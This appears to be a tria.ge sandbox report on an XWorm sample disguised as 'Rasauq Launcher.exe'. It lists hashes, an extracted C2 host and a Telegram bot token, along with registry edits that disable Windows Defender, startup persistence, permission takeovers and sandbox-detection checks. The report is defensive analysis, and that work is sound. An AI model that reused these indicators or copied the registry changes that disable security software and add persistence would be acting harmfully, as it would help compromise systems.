Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
105s -
max time network
283s -
platform
windows11-21h2_x64 -
resource
win11-20250314-en -
resource tags
arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system -
submitted
17/03/2025, 15:22
Static task
static1
Behavioral task
behavioral1
Sample
Rasauq Launcher.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Rasauq Launcher.exe
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral3
Sample
Rasauq Launcher.exe
Resource
win11-20250314-en
Errors
General
-
Target
Rasauq Launcher.exe
-
Size
84KB
-
MD5
569a09ebfa64b8f5ec39a17c2b3bc4dd
-
SHA1
1d2b2b9c024f2e204ab0b4bbba9a6c305038d487
-
SHA256
9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f
-
SHA512
960af03f64621beda154dc986cb80d3370f11cb1fe846bc91ec8ba6782dd71dba229926ef2fea0fec208713e6b5af07912ca1045c40fe5c246dd6377529ee01b
-
SSDEEP
1536:l5e2sHTvN2b4p98BcYCXSg0qMl3nRgt5P7ZJUqAA/WkywGKwkvOWkDDiun:q2W0n4lEl3RE5veV2Wniun
Malware Config
Extracted
xworm
looking-brings.gl.at.ply.gg:65381
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot8074871433:AAGd-vCZQOlCC_n2SUFT-qQ6fFThcBVDd1Y
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral3/files/0x001c00000002b25b-37.dat disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral3/files/0x001a00000002b1f2-7.dat family_xworm behavioral3/memory/1040-29-0x00000000004C0000-0x00000000004DA000-memory.dmp family_xworm -
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Xworm family
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 4100 bcdedit.exe 3420 bcdedit.exe 3600 bcdedit.exe 396 bcdedit.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5600 powershell.exe 4544 powershell.exe 1252 powershell.exe 3788 powershell.exe 1960 powershell.exe 5808 powershell.exe 1696 powershell.exe 1860 powershell.exe 4920 powershell.exe 3756 powershell.exe 3168 Process not Found 1372 powershell.exe 3848 powershell.exe 5836 powershell.exe 5572 powershell.exe 1444 powershell.exe 1968 powershell.exe 5928 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Manipulates Digital Signatures 1 TTPs 15 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ reg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 6044 netsh.exe 2364 netsh.exe -
Possible privilege escalation attempt 32 IoCs
pid Process 6056 takeown.exe 1920 icacls.exe 5240 takeown.exe 4880 icacls.exe 5728 takeown.exe 1108 takeown.exe 5836 takeown.exe 3860 icacls.exe 2692 icacls.exe 1076 takeown.exe 5692 icacls.exe 2196 icacls.exe 3560 takeown.exe 1392 icacls.exe 4668 takeown.exe 4712 icacls.exe 4236 icacls.exe 580 takeown.exe 4460 takeown.exe 3224 takeown.exe 2740 takeown.exe 5916 takeown.exe 2212 takeown.exe 916 takeown.exe 3860 icacls.exe 768 icacls.exe 296 takeown.exe 1700 takeown.exe 2824 takeown.exe 1520 icacls.exe 1072 icacls.exe 5440 icacls.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4744 attrib.exe 1384 attrib.exe -
Stops running service(s) 4 TTPs
-
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk Rasauq SoftWorks.exe -
Executes dropped EXE 4 IoCs
pid Process 1040 Rasauq SoftWorks.exe 6020 sRasauq SoftWorks.exe 2052 $77RealtekAudioDriverHost.exe 6532 Windows Host Service.scr -
Modifies file permissions 1 TTPs 32 IoCs
pid Process 6056 takeown.exe 4880 icacls.exe 2692 icacls.exe 5440 icacls.exe 3560 takeown.exe 5836 takeown.exe 1072 icacls.exe 4668 takeown.exe 3860 icacls.exe 2824 takeown.exe 768 icacls.exe 4460 takeown.exe 3224 takeown.exe 2740 takeown.exe 1108 takeown.exe 5728 takeown.exe 1520 icacls.exe 1920 icacls.exe 3860 icacls.exe 5240 takeown.exe 2196 icacls.exe 1392 icacls.exe 4236 icacls.exe 2212 takeown.exe 1076 takeown.exe 5692 icacls.exe 296 takeown.exe 1700 takeown.exe 5916 takeown.exe 580 takeown.exe 4712 icacls.exe 916 takeown.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" sRasauq SoftWorks.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" Rasauq SoftWorks.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 3 discord.com 92 discord.com 1219 discord.com -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1204 powercfg.exe 2272 powercfg.exe 1972 powercfg.exe 5728 powercfg.exe 4240 powercfg.exe 5544 powercfg.exe 3832 powercfg.exe 484 powercfg.exe 5884 powercfg.exe 1748 powercfg.exe 5424 powercfg.exe 3220 powercfg.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat cmd.exe File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File created C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe File opened for modification C:\Windows\System32\$666-RasauqBroker.bat cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" reg.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\SystemTemp msedge.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4680 sc.exe 5436 sc.exe 2832 sc.exe 5228 sc.exe 1888 sc.exe 1860 sc.exe 3180 sc.exe 1028 sc.exe 2072 sc.exe 3840 sc.exe 5476 sc.exe 2280 sc.exe 4656 sc.exe 5704 sc.exe 580 sc.exe 2708 sc.exe 236 sc.exe 2324 sc.exe 2832 sc.exe 2008 sc.exe 4400 sc.exe 5752 sc.exe 1368 sc.exe 4520 sc.exe 4104 sc.exe 2380 sc.exe 948 sc.exe 4692 sc.exe 3752 sc.exe 856 sc.exe 1492 sc.exe 4756 sc.exe 3764 sc.exe 4304 sc.exe 3148 sc.exe 1016 sc.exe 2780 sc.exe 2184 sc.exe 2324 sc.exe 4428 sc.exe 5828 sc.exe 728 sc.exe 3092 sc.exe 336 sc.exe 4284 sc.exe 1676 sc.exe 2664 sc.exe 1656 sc.exe 1616 sc.exe 4452 sc.exe 236 sc.exe 3648 sc.exe 1704 sc.exe 4772 sc.exe 3808 sc.exe 4104 sc.exe 5736 sc.exe 3784 sc.exe 2128 sc.exe 4664 sc.exe 5144 sc.exe 780 sc.exe 5076 sc.exe 3920 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 powercfg.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020 powercfg.exe Key opened 